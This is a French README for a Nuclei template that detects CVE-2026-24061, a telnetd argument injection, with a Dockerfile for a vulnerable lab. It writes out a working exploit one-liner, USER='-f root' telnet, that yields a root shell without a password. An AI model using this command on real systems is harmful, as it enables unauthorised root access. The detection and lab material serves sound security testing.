
Modèle Nuclei pour détecter CVE-2026-24061, une injection critique d'arguments telnet dans GNU inetutils telnetd permettant un accès root non authentifié.
Modèle Nuclei pour la détection de la vulnérabilité CVE-2026-24061 dans GNU inetutils telnetd, permettant d'obtenir un accès root sans authentification.
CVE-2026-24061 est une vulnérabilité critique d'injection d'arguments dans GNU inetutils telnetd, qui permet à un attaquant d'obtenir un shell root sans connaître le mot de passe.
%U a été ajouté à telnetd : /usr/bin/login -p -h %h %?u{-f %u}{%U}
Vulnérabilité : La variable d'environnement USER est transmise via le protocole telnet (RFC 1572 NEW-ENVIRON) et n'est pas assainie avant d'être insérée dans la commande.
Exploitation : L'attaquant définit USER="-f root" lors de la connexion :
USER="-f root" telnet -a target.com 23
/usr/bin/login -p -h hostname -f root
Le drapeau -f signifie "skip authentication" → root sans mot de passe 💀
inetutils-telnetd 2:2.0-1+deb11u2nuclei -t cve-2026-24061.yaml -u target.com:23 -code
nuclei -t cve-2026-24061.yaml -l targets.txt -code
Pour tester, vous pouvez déployer un conteneur Docker vulnérable :
FROM debian:11-slim
ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update && \
apt-get install -y --no-install-recommends \
inetutils-telnetd=2:2.0-1+deb11u2 \
telnet && \
rm -rf /var/lib/apt/lists/*
RUN useradd user1 && \
sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf
EXPOSE 23
CMD ["/usr/sbin/inetutils-inetd", "-d"]
Lancement :
# Construire l'image
docker build -t vuln-telnetd .
# Lancer
docker run -d -p 2323:23 vuln-telnetd
# Vérifier la vulnérabilité
nuclei -t cve-2026-24061.yaml -u 127.0.0.1:2323 -code -v
9.8 / 10 - Critique
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Cet outil est destiné uniquement aux tests de sécurité légaux sur des systèmes pour lesquels vous disposez d'une autorisation explicite.
L'auteur décline toute responsabilité en cas d'utilisation abusive de ce modèle.
Créé par Mr.Zapi